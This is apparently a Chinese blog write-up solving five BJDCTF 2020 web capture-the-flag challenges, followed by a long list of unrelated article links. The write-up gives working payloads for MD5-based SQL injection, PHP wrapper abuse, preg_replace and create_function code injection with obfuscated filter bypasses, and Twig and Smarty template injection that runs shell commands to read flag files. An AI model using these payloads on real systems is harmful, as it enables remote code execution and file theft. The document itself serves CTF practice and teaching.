Z3r4y
Z3r4y

【Web】BJDCTF 2020 个人复现

目录

①easy_md5

②ZJCTF,不过如此 

③Cookie is so subtle! 

④Ezphp

⑤The Mystery of IP

①easy_md5

【Web】BJDCTF 2020 个人复现_第1张图片

ffifdyop绕过SQL注入

sql注入:md5($password,true)

【Web】BJDCTF 2020 个人复现_第2张图片 右键查看源码

【Web】BJDCTF 2020 个人复现_第3张图片

数组绕过

?a[]=1&b[]=2 

跳转到levell14.php

【Web】BJDCTF 2020 个人复现_第4张图片

同样是数组绕过

param1[]=1¶m2[]=2 

②ZJCTF,不过如此 

【Web】BJDCTF 2020 个人复现_第5张图片

伪协议

?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

base64解码得next.php源码

 $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

 深入研究preg_replace与代码执行

payload:

/next.php?\S*=${getFlag()}&cmd=phpinfo(); 

 拿到flag【Web】BJDCTF 2020 个人复现_第6张图片

③Cookie is so subtle! 

先在flag.php输入admin

在hint.php右键查看源码

 bp抓包,看cookie

【Web】BJDCTF 2020 个人复现_第7张图片

user=这部分就是我们在flag.php输入的内容

【Web】BJDCTF 2020 个人复现_第8张图片

有SSTI的感觉了

尝试一下

【Web】BJDCTF 2020 个人复现_第9张图片

 掏出这张老图()

【Web】BJDCTF 2020 个人复现_第10张图片

三步试出来是Twig

Twig模板引擎注入

 最终payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("tac /f*")}}

【Web】BJDCTF 2020 个人复现_第11张图片

④Ezphp

进来右键查看源码

【Web】BJDCTF 2020 个人复现_第12张图片

 base32解码【Web】BJDCTF 2020 个人复现_第13张图片

 访问/1nD3x.php

 This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
";

if($_SERVER) { 
    if (
        preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
        )  
        die('You seem to want to do something bad?'); 
}

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') { 
        $file = $_GET["file"]; 
        echo "Neeeeee! Good Job!
";
    } 
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) { 
    foreach($_REQUEST as $value) { 
        if(preg_match('/[a-zA-Z]/i', $value))  
            die('fxck you! I hate English!'); 
    } 
} 

if (file_get_contents($file) !== 'debu_debu_aqua')
    die("Aqua is the cutest five-year-old child in the world! Isn't it ?
");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
    extract($_GET["flag"]);
    echo "Very good! you know my password. But what is flag?
";
} else{
    die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) { 
    die("
Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="); 
} else { 
    include "flag.php";
    $code('', $arg); 
} ?>

这题考了:

url编码绕过QUERY_STRING的正则匹配

%0a换行绕过preg_match 

EGPCS绕过$_REQUEST的字母匹配(记得清空cookie)

create_function()注入($code不能一直只是小写字母和数字组成)

payload:

/1nD3x.php?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&sh%61na[]=1&p%61sswd[]=2&fl%61g[c%6fde]=create_function&fl%61g[%61rg]=}var_dump(get_defined_vars());//

post传:

debu=1&file=1

【Web】BJDCTF 2020 个人复现_第14张图片

告诉了我们flag的路径 

 

直接访问/rea1fl4g.php没有结果

【Web】BJDCTF 2020 个人复现_第15张图片

require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);

取反绕过关键词过滤

最终payload:

?deb%75=aq%75a_is_c%75te%0a&file=data://text/plain,deb%75_deb%75_aq%75a&sh%61na[]=1&p%61sswd[]=2&fl%61g[c%6fde]=create_function&fl%61g[%61rg]=}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

⑤The Mystery of IP

提示XFF处可以SSTI 

测出是Smarty模板注入

payload:

X-Forwarded-For:{if system('cat /flag')}{/if}

你可能感兴趣的:(CTF,WEB,安全,bjdctf)

  • 在 if 语句内部直接修改解包的 Optional 值 狼_夏天 SwiftTips开发语言swift
    在if语句内部直接修改解包的Optional值平时写需要解包的代码时,我们通常会使用iflet或guardlet来安全地解包Optional值。但有时我们需要在解包后直接修改这个值,这时候就可以使用ifvar语句。varoptionalValue:Int?=42ifvarvalue=optionalValue{value+=10//修改解包后的值print("修改后的值是:\(value)")//
  • 提名 Apache ShardingSphere Committer,说说方法
    优质资源分享学习路线指引(点击解锁)知识定位人群定位Python实战微信订餐小程序进阶级本课程是pythonflask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。Python量化交易实战入门级手把手带你打造一个易扩展、更安全、效率更高的量化交易系统文章首发在公众号(龙台的技术笔记),之后同步到博客园和个人网站:xiaomage.info就在前几天,收到了ApacheS
  • Apache Seata < 2.3.0 raft反序列化漏洞 墨菲安全 ApacheSeata反序列化漏洞CVE-2025-32897
    【高危】ApacheSeata<2.3.0raft反序列化漏洞漏洞描述ApacheSeata(incubating)是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。受影响版本中,SeataServer的Raft模块的CustomDeserializer直接通过Class.forName()加载用户可控的类名,未做安全校验,攻击者可借此利用服务端已有的恶意链实
  • Java开发的智能新时代——如何利用AI工具提升编程效率 inscode_055
    最新接入DeepSeek-V3模型,点击下载最新版本InsCodeAIIDE标题:Java开发的智能新时代——如何利用AI工具提升编程效率引言在当今快速发展的科技时代,Java作为一门广泛应用的编程语言,在企业级应用、Web开发、移动应用等领域占据着重要地位。然而,随着项目复杂度的增加和开发周期的缩短,传统的开发方式已难以满足现代开发的需求。幸运的是,智能化的工具软件如InsCodeAIIDE正逐
  • Java 开发的智能化革命——如何借助最新工具提升编程效率 inscode_014
    最新接入DeepSeek-V3模型,点击下载最新版本InsCodeAIIDE标题:Java开发的智能化革命——如何借助最新工具提升编程效率在当今快速发展的科技时代,Java作为一门广泛应用的编程语言,依然保持着其强大的生命力和广泛的影响力。无论是企业级应用、Web开发还是移动应用开发,Java都扮演着不可或缺的角色。然而,随着项目复杂度的增加和技术更新换代的速度加快,Java开发者们面临着前所未有
  • GlobalFilter、Filter关系 m0_63486540 javajava
    维度GlobalFilterFilter技术体系SpringCloudGateway+WebFluxJavaServletAPI编程模型响应式(Reactive)阻塞式(Imperative)作用范围全局(所有路由)可配置路径模式执行效率更高(基于事件循环)较低(线程池模型)配置方式SpringBean自动注册web.xml或@WebFilter如何选择?如果你正在开发API网关或微服务入口,使用
  • 前端代码规范 及 最佳实践 forlong401 前端HTML5
    http://coderlmn.github.io/code-standards/概述本文档包含了Isobar公司的创意技术部(前端工程)开发web应用的规范。现在我们把它开放给任何希望了解我们迭代过程最佳实践的人。编写本文档的主要驱动力是两方面:1)代码一致性以及2)最佳实践。通过保持代码风格和传统的一致性,我们可以减少遗留系统维护的负担,并降低未来系统崩溃的风险。而通过遵照最佳实践,我们能确保
  • # 国产高性能VPX6U模块:飞腾4核/8核处理器助力数据处理与通信
    #产品概述今天为大家介绍一款高性能国产VPX6U模块——飞腾4核/8核VPX6U模块。这款产品采用国产飞腾处理器,具备强大的数据处理能力和丰富的接口配置,是军工、通信、存储等领域的理想选择。##核心特点###1.国产飞腾处理器,性能灵活可选-模块兼容FT2000-4或D2000-8两种处理器-用户可根据实际性能需求自由选择-完全国产化方案,安全可控###2.丰富接口配置,多功能应用-万兆以太网、千
  • Paper Reading《SoK: Prudent Evaluation Practices for Fuzzing》 小苑同学 安全性测试网络安全
    论文链接:https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=10646824IEEESSP20241Introduction(背景意义)模糊测试是发现软件漏洞的高效方法,被Meta、Google等企业广泛应用,且大量学术研究持续改进其技术(如覆盖反馈、领域扩展)。过去六年(2018-2023)中,顶级安全与软件工程会议上发表了超280
  • 论文学习_SoK: An Essential Guide For Using Malware Sandboxes In Security Applications: Challenges, Pitfa kitsch0x97 学习
    0.文章概述恶意软件沙箱尽管在安全应用程序中带来许多优势,但其复杂的选择、配置和使用过程常让新用户不知所措,甚至可能导致错误的部署,进而对安全分析结果产生负面影响。目前,缺乏系统化的指导来帮助用户正确选择和应用沙箱工具,这种知识空白阻碍了沙箱在不同研究领域中的有效应用。为了填补这一知识空白,研究团队系统分析了84篇关于x86/64恶意软件沙箱的学术论文,并提出了一种新颖的框架,以简化沙箱组件和操作
  • SoK: A Critical Evaluation of Efficient Website Fingerprinting Defenses
    2023攻击和防御模型防御评估准确度、精确度和召回率:使用准确率来评估攻击模型在多类别封闭世界设置中的性能,但在二进制开放世界设置中使用精确率和召回率防御策略:(1)增加虚拟流量、(2)增加流量延迟、(3)将流量从一个流移到另一个流固定速率发送流量F,随机抽样以添加填充R,修改流量以产生与目标流量样本或模式的碰撞C,将流量分成多个流S,使用对抗性扰动来欺骗机器学习模型AF:(1)(2)BuFLO,
  • 通过 Java 调用 ChromeDriver 启动 Chrome 浏览器后,当用户**手动点击按钮**时导致标签页崩溃 Esengnet java
    importorg.openqa.selenium.WebDriver;importorg.openqa.selenium.chrome.ChromeDriver;importorg.openqa.selenium.chrome.ChromeOptions;importorg.openqa.selenium.remote.CapabilityType;importjava.util.HashMap
  • C200系列开发:C200PC_C200PC物联网应用开发 zhubeibei168 机器人及导航物联网strutsservlet机器人机器人二次开发
    C200PC物联网应用开发1.物联网概述物联网(InternetofThings,IoT)是指通过互联网将各种物理设备、车辆、家电、传感器等连接起来,使其能够相互通信和交换数据的技术。在工业控制系统中,物联网的应用可以大幅提高生产效率、降低成本、提高安全性,并实现远程监控和管理。Honeywell的C200PC系列控制器是专门为工业物联网应用设计的,具备强大的数据处理能力和网络通信功能。1.1物联
  • Java基础 集合框架 队列架构 双端队列 Deque 骑牛小道士 集合框架之队列java开发语言
    双端队列DequeDeque方法简介Deque核心特点Deque实现类ArrayDequeArrayDeque构造方法ArrayDeque的数据结构及实现原理ArrayDeque方法介绍ArrayDeque核心特性ArrayDeque总结ArrayDeque使用样例代码Deque实现类LinkedListDeque实现类ConcurrentLinkedDeque(非阻塞线程安全)Concurren
  • .NET 8/9异步编程黄金法则:零缺陷与性能飞跃实战
    ——从“未等待任务”到线程池优化的深度避坑指南异步编程的“暗礁”与.NET8/9的破局之道在.NET应用中,异步编程是提升响应性和资源利用率的核心技术,但不当使用可能导致线程死锁、内存泄漏、未捕获异常等致命问题。.NET8/9通过托管线程池优化、服务器GC改进和编译器增强,为开发者提供了更安全高效的异步编程环境。本文将通过10个真实场景、20段代码示例和深度性能分析,手把手教你规避异步开发的常见陷
  • 突破反爬防线:Python3反爬虫原理与绕过策略深度解析 程序员威哥 爬虫网络scrapypython开发语言
    在信息化时代,数据已成为互联网的重要资产。为了保护数据的安全和防止恶意抓取,越来越多的网站开始采用反爬虫技术。然而,随着反爬虫技术的不断演化,爬虫开发者面临的挑战也在日益增大。如何理解反爬虫原理并有效绕过这些防护措施,是每个爬虫开发者必须掌握的技能。本文将全面解析Python3在爬虫开发中的应用,深入探讨常见的反爬虫原理,并提供绕过反爬策略的实战经验。通过结合实际案例,帮助开发者掌握应对复杂反爬措
  • 从0到1构建智能招聘数据引擎:基于 Python 的 BOSS直聘信息采集实战与反爬破解指南 程序员威哥 python开发语言
    前言在大数据浪潮席卷的时代,招聘平台蕴藏着海量的岗位信息,揭示着行业走向、人才趋势、薪资结构等核心价值。BOSS直聘作为国内极具代表性的直招平台,其数据对职业分析、市场监测甚至智能推荐系统的构建都有着重要意义。本文将手把手带你打造一个高质量、抗封锁的Python爬虫系统,精准采集BOSS直聘网的岗位数据,并全面解析其中涉及的反爬机制识别、加密参数处理、数据提取与存储等高级技巧,助你在Web数据采集
  • 物联网实战:多语言(Java、Go、Rust、C++、C#、Rust)设备接入与数据处理 KENYCHEN奉孝 RustC++gospringjavavue.jsrustc++
    SpringBoot物联网设备接入与数据处理实例物联网(IoT)设备接入与数据处理是SpringBoot的常见应用场景之一。以下是一个完整的实例,涵盖设备接入、数据传输、数据处理和存储等关键环节。设备接入物联网设备通常通过MQTT、HTTP或WebSocket等协议接入系统。MQTT是物联网领域最常用的轻量级协议。//MQTT配置类@ConfigurationpublicclassMqttConf
  • image-webpack-loader 使用教程 毛炎宝Gardener
    image-webpack-loader使用教程image-webpack-loaderImageloadermoduleforwebpack项目地址:https://gitcode.com/gh_mirrors/im/image-webpack-loader1.项目目录结构及介绍image-webpack-loader是一个用于Webpack的图片压缩加载器。由于该仓库主要是npm包而非独立的应
  • 本周沪铜想法 落雪财神意 人工智能
    核心逻辑:低库存与地缘风险缓和支撑价格,但淡季需求疲软与关税悬疑压制反弹空间,短期维持高位震荡一、成本高企与利润分化当前沪铜市场,成本端与产业链利润呈现出复杂态势。铜精矿加工费(TC)持续处于-43.56美元/吨的负值区间,冶炼厂仍处于“加工即亏损”的艰难处境。海外矿端的一系列扰动是主因:秘鲁安塔米纳铜矿因事故全面停工,智利Sentinel铜矿也因安全问题局部停产,使得短期铜精矿供应愈发紧张;市场
  • ASP.NET Core + Vue.js前后端分离黄金法则:从零到部署的深度实战 墨夶 C#学习资料asp.netvue.js后端
    ——跨域、热更新、容器化部署一网打尽为什么选择前后端分离?在微服务与敏捷开发盛行的今天,前后端分离架构已成为企业级应用的标配。本文将通过12个实战代码示例、跨域问题终极解决方案和Docker部署全流程,手把手教你实现:零配置跨域通信Vue热重载+WebAPI实时调试JWT身份验证与权限控制生产环境优化与容器化部署一、环境准备与项目搭建1.1开发环境配置工具版本要求官网链接.NET8SDK8.0.1
  • Webpack中的Loader详解
    Loader是Webpack中用于处理模块的转换器。它们可以将文件从一种格式转换为另一种格式,比如将TypeScript转换为JavaScript,将SCSS转换为CSS等。使用Loader,可以使Webpack处理各种类型的文件,而不仅仅是JavaScript。1.Loader基础1.1.基础使用Loader就像是一个翻译员,能把源文件经过转化后输出新的结果,并且一个文件还可以链式地经过多个翻译
  • flutter开发之状态管理、路由管理、 马拉萨的春天 flutter开发一天一读flutter前端javascript
    2.3状态管理#2.3.1简介响应式的编程框架中都会有一个永恒的主题——“状态(State)管理”,无论是在React/Vue(两者都是支持响应式编程的Web开发框架)还是Flutter中,他们讨论的问题和解决的思想都是一致的。所以,如果你对React/Vue的状态管理有了解,可以跳过本节。言归正传,我们想一个问题,StatefulWidget的状态应该被谁管理?Widget本身?父Widget?
  • 一站式 IT 资产管理:零信任产品的多维对比 scuter_yu 安全网络
    在数字化转型的浪潮中,企业面临着日益复杂的网络安全挑战,零信任安全理念应运而生并逐渐成为保障企业信息安全的重要手段。腾讯iOA零信任产品、深信服零信任安全解决方案、奇安信零信任安全解决方案以及GoogleBeyondCorp零信任网络架构等产品在市场上各有千秋,尤其在一站式IT资产管理方面,它们展现了不同的特色与优势。以下是对每款产品在一站式IT资产管理方面的分点对比:腾讯iOA零信任产品细粒度统
  • 业界优秀零信任安全管理系统产品介绍 scuter_yu 安全网络
    腾讯iOA零信任安全管理系统腾讯iOA零信任安全管理系统是基于腾讯自身无边界零信任企业网的最佳实践推出的终端访问管理方案。它以可信终端、可信身份、可信应用、可信链路为核心,全方位保护企业终端安全,无需VPN即可实现远程办公,且支持公有云和本地云部署模式。该系统依托腾讯安全威胁情报中心,日均拦截超10亿次攻击,其客户端轻量化设计兼容多平台,员工接受度高,助力企业安全上云和数字化转型。深信服零信任iT
  • selenium中使用新版edge jerrism 爬虫
    安装seleniumpip3installselenium下载浏览器对应版本的driver,浏览器版本可在设置-关于MicrosoftEdge中找到,https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/将下载完的可执行文件放入环境变量,并改名为MicrosoftWebDriver.exe测试importtimef
  • 赋能低压分布式光伏“四可”建设,筑牢电网安全新防线 Amy18702111823 分布式
    在“双碳”目标驱动下,分布式光伏正以前所未有的速度接入电网,尤其是低压(380V/220V)层面。然而,海量“绿电”的随机性、间歇性并网,犹如一把双刃剑——在带来清洁能源的同时,也给电网的安全稳定运行与可靠供电带来了严峻挑战。如何让这些分散的“毛细血管”变得“可观、可测、可调、可控”(四可),已成为电网企业和新能源管理者亟待解决的核心命题。“四可”落地:低压分布式光伏管理的硬核需求实现“四可”并非
  • 打造世赛级信息安全实训室:一站式建设方案大揭秘
    在当今数字化时代,信息安全已成为全球关注的焦点。随着信息技术的飞速发展,各类网络安全威胁日益复杂多样,对专业信息安全人才的需求也愈发迫切。世界职业院校技能大赛作为全球最高层级的职业技能赛事,其信息安全项目更是汇聚了各国顶尖的技能人才,展示着这一领域最前沿的技术与应用。打造一个达到世赛级别的信息安全实训室,无疑是培养高素质信息安全人才、提升国家网络安全防御能力的关键举措。以下将为您揭秘一站式建设世赛
  • 基于springboot+mysql+jpa+html实现商品销售信息系统 五星资源 springbootmysqljava
    基于springboot+mysql+jpa+html实现商品销售信息系统一、系统介绍1、系统主要功能:2.涉及技术框架:3.本项目所用环境:二、功能展示三、其它系统四、获取源码一、系统介绍1、系统主要功能:订单管理模块商品管理模块品牌管理模块分类管理模块客户管理模块供应商管理模块2.涉及技术框架:web框架:SpringBoot数据库框架:SpingDataJPA数据库:MySql项目构建工具:
  • spring注解整合 多大的心灵伤害吖 springjava
    使用注解的优势:1.采用纯java代码,不在需要配置繁杂的xml文件2.在配置中也可享受面向对象带来的好处3.类型安全对重构可以提供良好的支持4.减少复杂配置文件的同时亦能享受到springIoC容器提供的功能一、注解详解(配备了完善的释义)------(可采用ctrl+F来进行搜索哦~~~~)@SpringBootApplication:申明让springboot自动给程序进行必要的配置,这个配
  • Spring4.1新特性——Spring MVC增强 jinnianshilongnian spring 4.1
    目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
  • mysql 性能查询优化 annan211 javasql优化mysql应用服务器
    1 时间到底花在哪了? mysql在执行查询的时候需要执行一系列的子任务,这些子任务包含了整个查询周期最重要的阶段,这其中包含了大量为了 检索数据列到存储引擎的调用以及调用后的数据处理,包括排序、分组等。在完成这些任务的时候,查询需要在不同的地方 花费时间,包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
  • windows系统配置 cherishLC windows
    删除Hiberfil.sys :使用命令powercfg -h off 关闭休眠功能即可: http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 类似的还有pagefile.sys msconfig 配置启动项 shutdown 定时关机 ipconfig 查看网络配置 ipconfig /flushdns
  • 人体的排毒时间 Array_06 工作
    ======================== ||  人体的排毒时间是什么时候?|| ======================== 转载于: http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
  • ZooKeeper cugfy zookeeper
    Zookeeper是一个高性能,分布式的,开源分布式应用协调服务。它提供了简单原始的功能,分布式应用可以基于它实现更高级的服务,比如同步, 配置管理,集群管理,名空间。它被设计为易于编程,使用文件系统目录树作为数据模型。服务端跑在java上,提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现,是高有效和可靠的协同工作系统,Zookeeper能够用来lea
  • 网络爬虫的乱码处理 随意而生 爬虫网络
    下边简单总结下关于网络爬虫的乱码处理。注意,这里不仅是中文乱码,还包括一些如日文、韩文 、俄文、藏文之类的乱码处理,因为他们的解决方式 是一致的,故在此统一说明。     网络爬虫,有两种选择,一是选择nutch、hetriex,二是自写爬虫,两者在处理乱码时,原理是一致的,但前者处理乱码时,要看懂源码后进行修改才可以,所以要废劲一些;而后者更自由方便,可以在编码处理
  • Xcode常用快捷键 张亚雄 xcode
    一、总结的常用命令:     隐藏xcode command+h     退出xcode command+q     关闭窗口 command+w     关闭所有窗口 command+option+w     关闭当前
  • mongoDB索引操作 adminjun mongodb索引
    一、索引基础:    MongoDB的索引几乎与传统的关系型数据库一模一样,这其中也包括一些基本的优化技巧。下面是创建索引的命令:    > db.test.ensureIndex({"username":1})    可以通过下面的名称查看索引是否已经成功建立: &nbs
  • 成都软件园实习那些话 aijuans 成都 软件园 实习
    无聊之中,翻了一下日志,发现上一篇经历是很久以前的事了,悔过~~   断断续续离开了学校快一年了,习惯了那里一天天的幼稚、成长的环境,到这里有点与世隔绝的感觉。不过还好,那是刚到这里时的想法,现在感觉在这挺好,不管怎么样,最要感谢的还是老师能给这么好的一次催化成长的机会,在这里确实看到了好多好多能想到或想不到的东西。   都说在外面和学校相比最明显的差距就是与人相处比较困难,因为在外面每个人都
  • Linux下FTP服务器安装及配置 ayaoxinchao linuxFTP服务器vsftp
    检测是否安装了FTP [root@localhost ~]# rpm -q vsftpd 如果未安装:package vsftpd is not installed  安装了则显示:vsftpd-2.0.5-28.el5累死的版本信息   安装FTP 运行yum install vsftpd命令,如[root@localhost ~]# yum install vsf
  • 使用mongo-java-driver获取文档id和查找文档 BigBird2012 driver
    注:本文所有代码都使用的mongo-java-driver实现。   在MongoDB中,一个集合(collection)在概念上就类似我们SQL数据库中的表(Table),这个集合包含了一系列文档(document)。一个DBObject对象表示我们想添加到集合(collection)中的一个文档(document),MongoDB会自动为我们创建的每个文档添加一个id,这个id在
  • JSONObject以及json串 bijian1013 jsonJSONObject
    一.JAR包简介     要使程序可以运行必须引入JSON-lib包,JSON-lib包同时依赖于以下的JAR包:     1.commons-lang-2.0.jar     2.commons-beanutils-1.7.0.jar     3.commons-collections-3.1.jar &n
  • [Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性 bit1129 zookeeper
    为了说明问题,看个简单的代码,   import org.apache.zookeeper.*; import java.io.IOException; import java.util.concurrent.CountDownLatch; import java.util.concurrent.ThreadLocal
  • 【Scala十二】Scala核心六:Trait bit1129 scala
    Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
  • weblogic version 10.3破解 ronin47 weblogic
    版本:WebLogic Server 10.3 说明:%DOMAIN_HOME%:指WebLogic Server 域(Domain)目录 例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 1.为了保证操作安全,备份%DOMAIN_HOME%/security/Defa
  • 求第n个斐波那契数 BrokenDreams
            今天看到群友发的一个问题:写一个小程序打印第n个斐波那契数。         自己试了下,搞了好久。。。基础要加强了。           &nbs
  • 读《研磨设计模式》-代码笔记-访问者模式-Visitor bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; interface IVisitor { //第二次分派,Visitor调用Element void visitConcret
  • MatConvNet的excise 3改为网络配置文件形式 cherishLC matlab
    MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包,可以使用GPU。 主页: http://www.vlfeat.org/matconvnet/ 教程: http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 注意:需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet: http
  • ZK Timeout再讨论 chenchao051 zookeepertimeouthbase
    http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题,但是又出现了一个问题,我把min和max都设置成了180000,但是仍然出现了以下的异常信息: Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
  • CASE WHEN 用法介绍 daizj sqlgroup bycase when
    CASE WHEN 用法介绍 1. CASE WHEN 表达式有两种形式 --简单Case函数  CASE sex  WHEN '1' THEN '男'  WHEN '2' THEN '女'  ELSE '其他' END  --Case搜索函数  CASE WHEN sex = '1' THEN
  • PHP技巧汇总:提高PHP性能的53个技巧 dcj3sjt126com PHP
    PHP技巧汇总:提高PHP性能的53个技巧  用单引号代替双引号来包含字符串,这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量,  单引号则不会,注意:只有echo能这么做,它是一种可以把多个字符串当作参数的函数译注:  PHP手册中说echo是语言结构,不是真正的函数,故把函数加上了双引号)。  1、如果能将类的方法定义成static,就尽量定义成static,它的速度会提升将近4倍
  • Yii框架中CGridView的使用方法以及详细示例 dcj3sjt126com yii
    CGridView显示一个数据项的列表中的一个表。 表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。  CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。 实例代码如下:
  • Maven项目打包成可执行Jar文件 dyy_gusi assembly
    Maven项目打包成可执行Jar文件 在使用Maven完成项目以后,如果是需要打包成可执行的Jar文件,我们通过eclipse的导出很麻烦,还得指定入口文件的位置,还得说明依赖的jar包,既然都使用Maven了,很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作,使用assembly插件。具体使用方式如下: 1、在项目中加入插件的依赖: <plugin>
  • php常见错误 geeksun PHP
    1.  kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
  • 修改linux的用户名 hongtoushizi linuxchange password
    Change Linux Username 更改Linux用户名,需要修改4个系统的文件: /etc/passwd /etc/shadow /etc/group /etc/gshadow 古老/传统的方法是使用vi去直接修改,但是这有安全隐患(具体可自己搜一下),所以后来改成使用这些命令去代替: vipw vipw -s vigr vigr -s   具体的操作顺
  • 第五章 常用Lua开发库1-redis、mysql、http客户端 jinnianshilongnian nginxlua
    对于开发来说需要有好的生态开发库来辅助我们快速开发,而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。 一些常见的Lua库可以在github上搜索,https://github.com/search?utf8=%E2%9C%93&q=lua+resty。   Redis客户端 lua-resty-r
  • zkClient 监控机制实现 liyonghui160com zkClient 监控机制实现
             直接使用zk的api实现业务功能比较繁琐。因为要处理session loss,session expire等异常,在发生这些异常后进行重连。又因为ZK的watcher是一次性的,如果要基于wather实现发布/订阅模式,还要自己包装一下,将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能,比如分布式锁,leader选举
  • 在Mysql 众多表中查找一个表名或者字段名的 SQL 语句 pda158 mysql
    在Mysql 众多表中查找一个表名或者字段名的 SQL 语句:   方法一:SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name';   方法二:SELECT column_name from information_schema.colum
  • 程序员对英语的依赖 Smile.zeng 英语程序猿
    1、程序员最基本的技能,至少要能写得出代码,当我们还在为建立类的时候思考用什么单词发牢骚的时候,英语与别人的差距就直接表现出来咯。 2、程序员最起码能认识开发工具里的英语单词,不然怎么知道使用这些开发工具。 3、进阶一点,就是能读懂别人的代码,有利于我们学习人家的思路和技术。 4、写的程序至少能有一定的可读性,至少要人别人能懂吧... 以上一些问题,充分说明了英语对程序猿的重要性。骚年
  • Oracle学习笔记(8) 使用PLSQL编写触发器 vipbooks oraclesql编程活动Access
        时间过得真快啊,转眼就到了Oracle学习笔记的最后个章节了,通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧,这东东如果一段时间不用很快就会忘记了,所以我会把自己学习过的东西做好详细的笔记,用到的时候可以随时查找,马上上手!希望这些笔记能对大家有些帮助!     这是第八章的学习笔记,学习完第七章的子程序和包之后
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他